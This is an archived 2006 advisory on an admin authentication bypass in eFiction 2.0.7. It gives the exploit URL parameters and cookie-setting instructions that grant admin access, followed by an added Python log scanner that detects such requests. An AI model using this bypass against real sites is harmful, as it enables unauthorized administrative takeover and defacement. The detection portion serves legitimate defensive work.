##########################################
# eFiction vulnerability
##########################################
# I am releasing this to the public. Vendor was notified. Someone is also illegally defacing
these websites under MY name, which is a shame because they ripped it from a private discussion
on g00ns.net. This proof of concept is not to be used to illegally hack websites. I do not condone,
nor act in this type of activity. I suggest whoever is defacing websites under my name stop,
since you would gain more notoriety under your own name.
##########################################

http://[target].com/efiction/index.php?adminloggedin=1&loggedin=1&level=1

Use Firefox's extension "add n edit cookies" to add these to your cookies so they stick.
(i.e., instead of $_GET['loggedin'] it's $_COOKIE['loggedin'], which stays with each page)

# milw0rm.com [2006-08-25]
eFiction 2.0.7 Remote Admin Authentication Bypass Vulnerability
Vipsta
08/25/2006
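
Added example, not part of the original advisory or of eFiction's code: a log check for requests that supply the login-state names from the advisory (adminloggedin, loggedin, level) in the query string or in a cookie. The log layout (Apache combined format with the Cookie header appended as a final quoted field), the function names and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter names the advisory shows being accepted from the client as login state.
STATE_NAMES = {"adminloggedin", "loggedin", "level"}

# Assumed layout: Apache combined format plus the Cookie header as a last quoted field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)

def client_supplied_state(line):
    """Return (ip, status, {source: names}) when a request carries state names, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparseable line: nothing to report
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    cookies = {part.split("=", 1)[0].strip().lower() for part in m["cookie"].split(";")}
    hits = {
        "query": sorted(STATE_NAMES & {name.lower() for name in query}),
        "cookie": sorted(STATE_NAMES & cookies),
    }
    hits = {source: names for source, names in hits.items() if names}
    return (m["ip"], m["status"], hits) if hits else None

def scan(lines):
    """Collect findings for every log line that sets login state from the client side."""
    return [finding for finding in map(client_supplied_state, lines) if finding]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Aug/2006:10:01:02 +0000] "GET /efiction/index.php'
    '?adminloggedin=1&loggedin=1&level=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"',
    '203.0.113.7 - - [25/Aug/2006:10:01:09 +0000] "GET /efiction/index.php HTTP/1.1" '
    '200 7301 "-" "Mozilla/5.0" "adminloggedin=1; loggedin=1; level=1"',
    '198.51.100.4 - - [25/Aug/2006:10:02:00 +0000] "GET /efiction/index.php HTTP/1.1" '
    '200 9000 "-" "Mozilla/5.0" "PHPSESSID=constructed"',
]

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(ip, status, hits)
```

The three names are generic, so a hit is a lead to correlate with whether a real login request preceded it, not proof on its own.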